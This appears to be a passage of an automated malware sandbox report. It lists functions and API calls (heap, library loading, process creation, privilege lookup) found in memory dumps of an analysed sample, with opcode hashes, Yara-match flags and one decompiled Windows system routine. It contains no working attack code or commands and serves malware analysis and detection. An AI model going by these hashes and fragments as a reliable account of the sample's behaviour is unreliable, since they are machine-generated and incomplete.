                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 83befdbab9f969cf35fc842cdf8a5c5a7be4848ad294c221c7c0008b4741376a
                                      • Instruction ID: 635d0833e6c9369b189209c69381cd9c8c99c80ce2e5650e4545415059e32a98
                                      • Opcode Fuzzy Hash: 83befdbab9f969cf35fc842cdf8a5c5a7be4848ad294c221c7c0008b4741376a
                                      • Instruction Fuzzy Hash: B290027120104803D144A99965086860015D7E4341F51D025E5015555EC7A598917171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1b12089d5fdcf586c6423ec27c6e584fce88c03e000c895462985a9f5a0365bf
                                      • Instruction ID: b4d9629c61661fa4022002ea65a5bf47da14f02eb3400f9dc7860756a2ebc29d
                                      • Opcode Fuzzy Hash: 1b12089d5fdcf586c6423ec27c6e584fce88c03e000c895462985a9f5a0365bf
                                      • Instruction Fuzzy Hash: 5590026921304403D1C4B559650864A0015D7D5242F91D429E0006558CCB5598696361
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9c2b4e108cb61b5b082f41460461a6532336c4a496503314cd7b477bff67567a
                                      • Instruction ID: ef3226327dd4b1b97da44744784835ee260b6acce2e213cc9b51aaaf92e45691
                                      • Opcode Fuzzy Hash: 9c2b4e108cb61b5b082f41460461a6532336c4a496503314cd7b477bff67567a
                                      • Instruction Fuzzy Hash: 4090027131118803D154A55995047460015D7D5241F51C425E0815558DC7D598917162
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 306c0f266334f7a88cd0fb035f80984c23a0879193efdee5c4606e030673da57
                                      • Instruction ID: a8200ebd2e6c839ad38916143d99a1ac24d0e40c02793af735ad860f2f286e34
                                      • Opcode Fuzzy Hash: 306c0f266334f7a88cd0fb035f80984c23a0879193efdee5c4606e030673da57
                                      • Instruction Fuzzy Hash: C690027120508C43D184B5595504A860025D7D4345F51C025E0055694DD7659D55B6A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 47a2dea4e866d81f5922e9552e0422e6e310a80a033b1bd9daa885a83cb779e2
                                      • Instruction ID: c011abc94e82a1378dc281c3bcf9bef983074d5fd8621c59e4a2ea1cca40d5f0
                                      • Opcode Fuzzy Hash: 47a2dea4e866d81f5922e9552e0422e6e310a80a033b1bd9daa885a83cb779e2
                                      • Instruction Fuzzy Hash: 5190027120104C03D1C4B559550468A0015D7D5341F91C029E0016654DCB559A5977E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2f52d63f52b9600d7af970ead61cadae1f6a0615d6a78883bcbc4d728bf58a6a
                                      • Instruction ID: 30186fe849ebc6f9a8bd39f6e214971e8cdb807f55ad1e04ae820a651bcadd4f
                                      • Opcode Fuzzy Hash: 2f52d63f52b9600d7af970ead61cadae1f6a0615d6a78883bcbc4d728bf58a6a
                                      • Instruction Fuzzy Hash: 9C90027120104C43D144A5595504B860015D7E4341F51C02AE0115654DC755D8517561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0b82ecdb383a18cb88daf53bbc7b67407309c525d2209ed5539b90caa20c7064
                                      • Instruction ID: 29334daa77444d0af48ddf00f2e09aa1e0b8fdc1c890897be374221b939699f4
                                      • Opcode Fuzzy Hash: 0b82ecdb383a18cb88daf53bbc7b67407309c525d2209ed5539b90caa20c7064
                                      • Instruction Fuzzy Hash: 7F9002712010CC03D154A559950478A0015D7D4341F55C425E4415658DC7D598917161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2166c1889b0313da0f7dfb0fdcdb0d95ec13b3ff26f0956e9cb9e8e7e686f184
                                      • Instruction ID: c7073befde21fbc7ab43128da59ac6adc888915ad0806d192afdfe5575561c5f
                                      • Opcode Fuzzy Hash: 2166c1889b0313da0f7dfb0fdcdb0d95ec13b3ff26f0956e9cb9e8e7e686f184
                                      • Instruction Fuzzy Hash: F290047531104403414DFD5D17045470057D7DD3D1351C035F1007550CD771DC717171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: eaaec4c739684270e9f679b1a8f27cb2e3d49b72a1e3a9c723887c49ac51a2ce
                                      • Instruction ID: e1eafa1c05ea8a5f7e6630f376c780d745f4061644fc923d57d4ac5803bc018b
                                      • Opcode Fuzzy Hash: eaaec4c739684270e9f679b1a8f27cb2e3d49b72a1e3a9c723887c49ac51a2ce
                                      • Instruction Fuzzy Hash: 369002A1202044038149B5595514656401AD7E4241B51C035E1005590DC76598917165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0036A0A2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00353AF8), ref: 0036A09D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 25d34981c3e28e2558f7aab2208c8299a2011b770cc52e9718ee7f968d014376
                                      • Instruction ID: 010601394439ed214749d3cf2af8a6a49f467f54391f8b05dd428b2922b2aede
                                      • Opcode Fuzzy Hash: 25d34981c3e28e2558f7aab2208c8299a2011b770cc52e9718ee7f968d014376
                                      • Instruction Fuzzy Hash: 0901D6752006046FD714DF64CC85EE33B68EF88350F118599F95C6B242C234E9148BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0036A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00353AF8), ref: 0036A09D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction ID: b3ee174c2594a52c296dc146d252094f1943a0fdcb0d04df242f56b813188658
                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction Fuzzy Hash: 42E04FB12002086BD714DF59CC45EA777ACEF88750F118554FD086B241C630F910CAF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 003582E8, Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0035834A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0035836B
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 814a7c8b3497c8af4cd9528356a9d6a35719265d1fe4414fe3761df5f58c27ba
                                      • Instruction ID: eac687e26d816cc113b7a0e9517dc1609ab88abebd23401cc1d22543bd513e08
                                      • Opcode Fuzzy Hash: 814a7c8b3497c8af4cd9528356a9d6a35719265d1fe4414fe3761df5f58c27ba
                                      • Instruction Fuzzy Hash: 9501B135A806287AE722AA959C03FBE772CAF40F51F054118FF04BE1C5E694A90A46E6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 003582F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0035834A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0035836B
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 044c298a1d06f307a8119cdef661a26d78d53576b52967b50bafe86328bcddef
                                      • Instruction ID: 7e3042a056503dea08b08aeb2affd80521514eea4df9faed04582eab8821186f
                                      • Opcode Fuzzy Hash: 044c298a1d06f307a8119cdef661a26d78d53576b52967b50bafe86328bcddef
                                      • Instruction Fuzzy Hash: E701A231A802287BE722AA959C43FBE776CAB40F51F054118FF04BE1C5EAD4690A46F6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0035ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0035AD42
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                      • Instruction ID: 2b8e1dacf3166e2ae76de14e3fc7250263ca3d645bcd39de93496141580b1581
                                      • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                      • Instruction Fuzzy Hash: 160152B5D0010DA7DF10EBE4DC42FADB3B89B14308F008194AD089B145F671EB088B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0036A0DD, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0036A134
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 569332285c2d9c38515a7562ab613dbc98f96d3325256dae3e0c05f2b161810a
                                      • Instruction ID: e0dba6a908b50d81654cb862ea96e926d255f5358157d2f58a2e85273f449e70
                                      • Opcode Fuzzy Hash: 569332285c2d9c38515a7562ab613dbc98f96d3325256dae3e0c05f2b161810a
                                      • Instruction Fuzzy Hash: 7A01EFB2200208AFCB14CF98DC80EEB37ADAF8C754F158218FA4DA7244C630E851CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0036A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0036A134
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: ef933fdcf42811b9431cc881c3ab60840c4c6ef86934b49221add0c65dddf7e0
                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction Fuzzy Hash: B101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0035F698, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,00358CF4,?), ref: 0035F6CB
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 04c029aa51a440f7d80636e5d46265682d76a6efe01c60b34d8c71ae27644b3e
                                      • Instruction ID: cfa543cb0860b19cdf48e16be9f516a6b69595480e116785c076ccfef05c33dd
                                      • Opcode Fuzzy Hash: 04c029aa51a440f7d80636e5d46265682d76a6efe01c60b34d8c71ae27644b3e
                                      • Instruction Fuzzy Hash: F8E0C2A0AA83493DFB12BAB46C02F577A494B12394F8645B4F98CE90EBD80980194539
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0036A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00364506,?,00364C7F,00364C7F,?,00364506,?,?,?,?,?,00000000,00000000,?), ref: 0036A05D
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction ID: 47f97f9797172e692d5ac00d897cbc7df69add644fa493eae7d0bd38e7103a02
                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction Fuzzy Hash: ADE046B1200208ABDB14EF99CC81EA777ACEF88750F118558FE086B242C630F910CBF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0036A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0035F1A2,0035F1A2,?,00000000,?,?), ref: 0036A200
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: 7dabcf98fb4f58c840fa284c6e7477fb00a0ae1c09ae7cb236c15065fcd33c62
                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction Fuzzy Hash: FAE01AB12002086BDB10DF49CC85EE737ADEF88750F118154BA086B241CA30E8108BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0035F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,00358CF4,?), ref: 0035F6CB
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                      • Instruction ID: 5e731e428d73f0739ea7cc3390b0b0f771c171b41a349aa9f13d513c9ed08f2d
                                      • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                      • Instruction Fuzzy Hash: 29D0A7717903043BE610FAA49C03F2732CD6B45B01F494074FA48DB3D7D950E4004165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 031A967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 60abe3b091eaf2e9f723b4da539aa8c01430d2c7feffe516f36e8a3322de262e
                                      • Instruction ID: aacd84676b7ad2ce9fbc254c28bc73596dbb935c872602302a01f66923fed0ab
                                      • Opcode Fuzzy Hash: 60abe3b091eaf2e9f723b4da539aa8c01430d2c7feffe516f36e8a3322de262e
                                      • Instruction Fuzzy Hash: 57B09BB19014D9C7D655D76457087177914BBD8741F16C065D1060641A4778D0D1F5B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 031FFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 53%
                                      			E031FFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E031ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E031F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E031F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                      0x031ffdda
                                      0x031ffde2
                                      0x031ffde5
                                      0x031ffdec
                                      0x031ffdfa
                                      0x031ffdff
                                      0x031ffe0a
                                      0x031ffe0f
                                      0x031ffe17
                                      0x031ffe1e
                                      0x031ffe19
                                      0x031ffe19
                                      0x031ffe19
                                      0x031ffe20
                                      0x031ffe21
                                      0x031ffe22
                                      0x031ffe25
                                      0x031ffe40

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031FFDFA
                                      Strings
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031FFE01
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031FFE2B
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: 0702322ad4f424dfc7adaccd605a7f816d7705e39287068b7d295628dafd272e
                                      • Instruction ID: 860d54f27322c2df18d93b74fe70cca3f751103a9b7f61bcf1285b811469ee35
                                      • Opcode Fuzzy Hash: 0702322ad4f424dfc7adaccd605a7f816d7705e39287068b7d295628dafd272e
                                      • Instruction Fuzzy Hash: 4EF0F637640601BFD6249A45DC02F27BF5AEB49770F150314F7285A1D2EBA2F87186F0
                                      Uniqueness

                                      Uniqueness Score: -1.00%